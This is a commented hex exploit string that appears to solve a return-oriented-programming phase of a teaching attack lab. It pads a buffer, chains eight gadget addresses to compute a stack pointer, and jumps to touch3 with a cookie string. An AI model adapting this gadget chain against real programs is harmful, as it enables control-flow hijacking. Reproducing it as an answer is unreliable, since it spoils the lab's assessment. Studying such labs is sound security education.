/* Just a buffer the length of 0x38 */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00

/* Gadget 1 - movq %rsp, %rax (addval_267) */
be 1a 40 00 00 00 00 00

/* Gadget 2 - movq %rax, %rdi (getval_230) */
db 19 40 00 00 00 00 00

/* Gadget 3 - popq %rax        (getval_265) */
d4 19 40 00 00 00 00 00

/* Spacer */
48 00 00 00 00 00 00 00

/* Gadget 4 - movl %eax, %edx (addval_380) */
cd 1a 40 00 00 00 00 00

/* Gadget 5 - movl %edx, %ecx (addval_208) */
8d 1a 40 00 00 00 00 00

/* Gadget 6 - movl %ecx, %esi (addval_323) */
5f 1a 40 00 00 00 00 00

/* Gadget 7 - lea (%rdi, %rsi, 1), %rax (add_xy) */
06 1a 40 00 00 00 00 00

/* Gadget 8 - movq %rax, %rdi (getval_230)*/
db 19 40 00 00 00 00 00

/* Address for touch3 */
3f 19 40 00 00 00 00 00

/* Cookie string */
35 34 37 35 36 38 32 35